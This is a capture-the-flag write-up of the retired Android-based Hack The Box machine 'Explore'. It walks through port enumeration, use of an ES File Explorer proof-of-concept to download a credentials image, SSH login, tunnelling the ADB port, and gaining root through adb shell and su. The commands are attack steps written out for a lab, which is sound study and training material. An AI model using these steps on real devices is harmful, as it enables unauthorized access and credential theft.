Name: Explore
Release Date: 26 Jun 2021
Retire Date: 30 Oct 2021
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
JoshSH 00 days, 00 hours, 03 mins, 27 seconds
jkr 00 days, 00 hours, 18 mins, 56 seconds
Creator: bertolis
Pentest Workstation PDF: Explore.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.


We have SSH (TCP 2222), FREECIV/ADB (TCP 5555), and HTTP Bukkit JSONAPI (TCP 59777) that are the major ports that we need to look at right now.  Gobuster found several pages and directories that could be interesting.


gobuster dir -w /usr/share/dirb/wordlists/big.txt -u

└─$ gobuster dir -u -w /usr/share/dirb/wordlists/big.txt -o gobusterExplore.out           
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/01/17 08:41:32 Starting gobuster in directory enumeration mode
/acct                 (Status: 301) [Size: 65] [--> /acct/]
/bin                  (Status: 301) [Size: 63] [--> /bin/] 
/cache                (Status: 301) [Size: 67] [--> /cache/]
/config               (Status: 301) [Size: 69] [--> /config/]
/d                    (Status: 301) [Size: 59] [--> /d/]     
/data                 (Status: 301) [Size: 65] [--> /data/]  
/dev                  (Status: 301) [Size: 63] [--> /dev/]   
/etc                  (Status: 301) [Size: 63] [--> /etc/]   
/init                 (Status: 403) [Size: 31]               
/lib                  (Status: 301) [Size: 63] [--> /lib/]   
/mnt                  (Status: 301) [Size: 63] [--> /mnt/]   
/oem                  (Status: 301) [Size: 63] [--> /oem/]   
/proc                 (Status: 301) [Size: 65] [--> /proc/]  
/product              (Status: 301) [Size: 71] [--> /product/]
/sbin                 (Status: 301) [Size: 65] [--> /sbin/]   
/storage              (Status: 301) [Size: 71] [--> /storage/]
/sys                  (Status: 301) [Size: 63] [--> /sys/]    
/system               (Status: 301) [Size: 69] [--> /system/] 
/vendor               (Status: 301) [Size: 69] [--> /vendor/] 
2022/01/17 08:56:26 Finished

Researching 5555 and 59777, we can discover ES File Explorer and it's information and vulnerabilities. Two great resources for those two ports are:





Clone the exploit repo and check the README.md file to see what commands can be run.  To save time, the one we need is:


python3 poc.py --ip= -c listPics then

python3 poc.py --ip= -g /storage/emulated/0/DCIM/creds.jpg

Open the creds.jpg file and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note..... (PASSWORD MANAGERS!!! I'm better now). At least it's a halfway decent password, so there's that.



This is obviously a phone, in case the ES File Explore wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which if I recall is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly AND we still have to find the user.txt flag.  Time to go old school manual. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it! 


:/sdcard $ cat user.txt


Now, if you recall port 5555 ADB was filtered, but what if we could utilize port tunneling to access it?  


ssh -L 5555:localhost:5555 kristi@ -p 2222


Then, we "should" be able to use adb connect to get another shell, hopefully as root, but we'll see.


└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555

└─$ adb devices      
List of devices attached
emulator-5554   device
localhost:5555  device


Notice there are two "devices" attached.  We need to specify which one we want adb to connect to the shell on. 


└─$ adb -s localhost:5555 shell                                                                                                    1 ⨯
x86_64:/ $ whoami                                                                                                                     
x86_64:/ $ su
:/ # whoami

Gotcha!!! Now we search for root.txt and this phone will be toast.


:/ # find / -name root.txt

:/data # cat root.txt


This was a completely different style of box/phone/thing....  But hey, another one down!